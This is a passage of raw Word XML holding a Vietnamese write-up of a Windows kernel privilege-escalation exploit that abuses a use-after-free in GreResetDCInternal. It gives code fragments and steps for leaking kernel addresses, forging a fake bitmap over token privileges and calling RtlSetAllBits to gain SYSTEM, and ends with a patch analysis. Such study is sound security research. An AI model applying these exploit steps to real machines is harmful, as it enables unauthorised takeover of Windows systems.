      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003407A4">
        <w:t>rtlSetAllBits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF5C07" w14:textId="7DD2F90F" w:rsidR="00735483" w:rsidRDefault="00735483" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nhưng vì offset ở mỗi phiên bản </w:t>
      </w:r>
      <w:r w:rsidR="0054757C">
        <w:t>lại khác nhau nên ta sẽ ghi đè offset trong khoảng POC đã dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED69019" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="36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4757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for</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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(DWORD i </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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54757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54757C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0</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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; i </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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54757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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757C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100</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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 i</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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++</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862DEA8" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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4757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r w:rsidRPr="0054757C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p</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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[i] </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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54757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fakeRtlBitMapAddr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404A920" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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4757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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8FF27" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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CC13C6E" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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4757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54757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for</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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(DWORD i </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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54757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54757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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757C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100</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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; i </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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(palSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054757C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8</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054757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i</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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++</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3829D2" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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4757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r w:rsidRPr="0054757C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p</w:t>
      </w:r>
      <w:r w:rsidRPr="0054757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[i] </w:t>
      </w:r>
      <w:r w:rsidRPr="0054757C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54757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rtlSetAllBits;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A91950" w14:textId="77777777" w:rsidR="0054757C" w:rsidRPr="0054757C" w:rsidRDefault="0054757C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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4757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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3986AE" w14:textId="31F96BED" w:rsidR="0054687B" w:rsidRPr="0054687B" w:rsidRDefault="0054687B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E131C1B" w14:textId="1D12B1A3" w:rsidR="00D62ABE" w:rsidRDefault="00E0497B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3)   </w:t>
      </w:r>
      <w:r w:rsidR="00D62ABE">
        <w:t>Hoàn thành forge memory layout để thực thi hàm gọi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE0E2E" w14:textId="003D1D5E" w:rsidR="00D62ABE" w:rsidRDefault="004D3742" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a)   </w:t>
      </w:r>
      <w:r w:rsidR="00431892">
        <w:t>Create fakePRTL_BITMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601BA9E" w14:textId="2AEB7A7C" w:rsidR="004D3742" w:rsidRDefault="007219C3" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Từ w</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t>8 trở lên</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> SMAP được bật </w:t>
      </w:r>
      <w:r>
        <w:t>nên</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> không thể </w:t>
      </w:r>
      <w:r>
        <w:t>lấy</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> dữ liệu trong vùng người dùng, vì vậy không thể trực tiếp sử dụng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tham số</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00431892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PRTL_BITMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="007219C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cho hàm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003407A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RtlSetAllBits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F3081" w14:textId="0B0A17C7" w:rsidR="009B6535" w:rsidRDefault="00431892" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Để có thể tạo </w:t>
      </w:r>
      <w:r w:rsidR="009B6535">
        <w:t>fakePRTL_BITMAP ta có thể theo các bước sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C4E85" w14:textId="43FC4C30" w:rsidR="009B6535" w:rsidRDefault="009B6535" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6535">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NtQuerySystemInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C33E8F">
        <w:t>để leak địa chỉ kernel của Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455D4C08" w14:textId="3CC791E4" w:rsidR="00F8685C" w:rsidRPr="000C2DAF" w:rsidRDefault="00F8685C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tạo fakePRTL_BITMAP </w:t>
      </w:r>
      <w:r w:rsidR="00514A8A">
        <w:t xml:space="preserve">vào bên trong kernel memory bằng cách sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00514A8A" w:rsidRPr="00514A8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SetInformationThread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59EB2A" w14:textId="0D212203" w:rsidR="000C2DAF" w:rsidRPr="00CB241D" w:rsidRDefault="00410F1D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Leak</w:t>
      </w:r>
      <w:r w:rsidR="000C2DAF" w:rsidRPr="000C2DAF">
        <w:t xml:space="preserve"> địa chỉ của bitmap bằng cách sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="000C2DAF" w:rsidRPr="000C2DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NtQuerySystemInformation</w:t>
      </w:r>
      <w:r w:rsidR="000C2DAF" w:rsidRPr="000C2DAF">
        <w:t xml:space="preserve"> với lớp </w:t>
      </w:r>
      <w:r w:rsidR="000C2DAF" w:rsidRPr="00410F1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SystemBigPoolInformation</w:t>
      </w:r>
      <w:r w:rsidR="00CB241D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C456D" w14:textId="56857B8B" w:rsidR="00CB241D" w:rsidRPr="00BD4D16" w:rsidRDefault="00CB241D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="008C3104">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/hugsy/d89c6ee771a4decfdf4f088998d60d19</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A415147" w14:textId="2AA2B4EA" w:rsidR="00BD4D16" w:rsidRDefault="00BD4D16" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD4D16">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Một kỹ thuật </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4D16">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit primitive</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4D16">
        <w:t xml:space="preserve"> đã được đề cập</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bởi Kaspersky đó là dùng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C2DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NtQuerySystemInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4D16">
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cùng với</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00410F1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SystemBigPoolInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(0x42) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4D16">
        <w:t xml:space="preserve">để liệt kê </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4D16">
        <w:t>large pools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="006F699A">
        <w:t>(bao gồm: size, kernel address,…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E942A" w14:textId="139A8A3C" w:rsidR="00F54869" w:rsidRDefault="002E26F9" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F54869" w:rsidRPr="00F54869">
        <w:t>ump information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E214B" w14:textId="6292FB4B" w:rsidR="00F54869" w:rsidRDefault="0029425E" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BBF4F60" wp14:editId="3554FBA1">
            <wp:extent cx="5349704" cy="2141406"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="207227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715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46D3" w14:textId="0C504D02" w:rsidR="00F54869" w:rsidRPr="001974BF" w:rsidRDefault="0029425E" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm address </w:t>
      </w:r>
      <w:r w:rsidR="001974BF">
        <w:t xml:space="preserve">với điều kiện size và </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001974BF" w:rsidRPr="001974BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45484D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF9F7"/>
        </w:rPr>
        <w:t>strncmp( info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001974BF" w:rsidRPr="001974BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45484D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF9F7"/>
        </w:rPr>
        <w:t>-&gt;PoolTag, "ThNm", 4)==0</w:t>
      </w:r>
      <w:r w:rsidR="001974BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45484D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF9F7"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A2295C" w14:textId="26FD4570" w:rsidR="001974BF" w:rsidRDefault="001974BF" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D5DAFA1" wp14:editId="6E279A70">
            <wp:extent cx="5966977" cy="3231160"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="998767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679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AC65" w14:textId="3E38FB47" w:rsidR="00431892" w:rsidRDefault="001974BF" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0064779C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fakePRTL_BITMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001974BF">
        <w:t xml:space="preserve"> BitMap</w:t>
      </w:r>
      <w:r>
        <w:t>Heder</w:t>
      </w:r>
      <w:r w:rsidRPr="001974BF">
        <w:t xml:space="preserve"> sẽ trỏ </w:t>
      </w:r>
      <w:r w:rsidRPr="0064779C">
        <w:t>đến</w:t>
      </w:r>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:t xml:space="preserve"> _SEP TOKEN PRIVILEGES.  </w:t>
      </w:r>
      <w:r w:rsidR="0064779C">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:t>ọi </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RtlSetAllBits</w:t>
      </w:r>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:t>BitMapHeader)</w:t>
      </w:r>
      <w:r w:rsidR="0064779C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064779C" w:rsidRPr="0064779C">
        <w:t xml:space="preserve">kích hoạt tất cả các đặc quyền bằng một </w:t>
      </w:r>
      <w:r w:rsidR="0064779C">
        <w:t>kernel function call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814F210" w14:textId="740C330F" w:rsidR="00D670EB" w:rsidRPr="00D040A0" w:rsidRDefault="00D670EB" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D670EB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Từ đây, người ta có thể lạm dụng các đặc quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cao</w:t>
      </w:r>
      <w:r w:rsidRPr="00D670EB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lấy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D670EB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907ED6A" w14:textId="2F729542" w:rsidR="00D040A0" w:rsidRDefault="00D040A0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IV) Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C2D6E0" w14:textId="31174B8E" w:rsidR="006C042D" w:rsidRDefault="006C042D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BA4CA4" wp14:editId="651D3038">
            <wp:extent cx="6188710" cy="3716020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194825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502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0C4E" w14:textId="46495F26" w:rsidR="006C042D" w:rsidRDefault="006C042D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D41AA3" wp14:editId="7FC74FC4">
            <wp:extent cx="6188710" cy="4039235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128918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816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22B0" w14:textId="1CEF59F3" w:rsidR="00D040A0" w:rsidRDefault="00D040A0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>V)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The patch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF4747" w14:textId="11E798FC" w:rsidR="00CB1386" w:rsidRDefault="00CB1386" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lỗ hổng xảy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve">do khi gọi hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GreResetDCInternal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> đã không kiểm tra con trỏ DC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> xem có bất thường hay không. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t>Khi tạo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t>DC object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> sẽ được </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tạo, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t>giá trị bộ đếm tham chiếu đối tượng sẽ tăng lên một lần mỗi lần được tham chiếu.</w:t>
      </w:r>
      <w:r w:rsidR="00DD42FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tiến</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> trình xảy ra bình thường khi giá trị đếm chỉ bằng 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D1183" w14:textId="463EA927" w:rsidR="00ED3076" w:rsidRDefault="00DD42FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CEC2218" wp14:editId="1C086D2B">
            <wp:extent cx="6188710" cy="3234690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="991107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079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DC73" w14:textId="77777777" w:rsidR="00CB1386" w:rsidRDefault="00CB1386" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve">ếu ResetDC được gọi lại trong </w:t>
      </w:r>
      <w:r>
        <w:t>callback function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GreResetDCInternal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> sẽ được gọi lần thứ hai và hàm tạo của DC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>bject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:t xml:space="preserve"> sẽ được gọi lại và tham chiếu đối tượng DC sẽ được thêm lại và số lượng tham chiếu sẽ là 2 vào lúc này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584193AD" w14:textId="6BFE4A0F" w:rsidR="00DD42FC" w:rsidRDefault="00DD42FC" w:rsidP="00A67CF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56C23C1" wp14:editId="3DEB9608">
            <wp:extent cx="6188710" cy="3207385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117523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334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ED9F" w14:textId="55F3BE7D" w:rsidR="00CB1386" w:rsidRDefault="00CB1386" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002E26F9">
        <w:t xml:space="preserve">Do đó, việc </w:t>
      </w:r>
      <w:r w:rsidR="00A67CF4">
        <w:t>xem xét trạng thái</w:t>
      </w:r>
      <w:r w:rsidRPr="002E26F9">
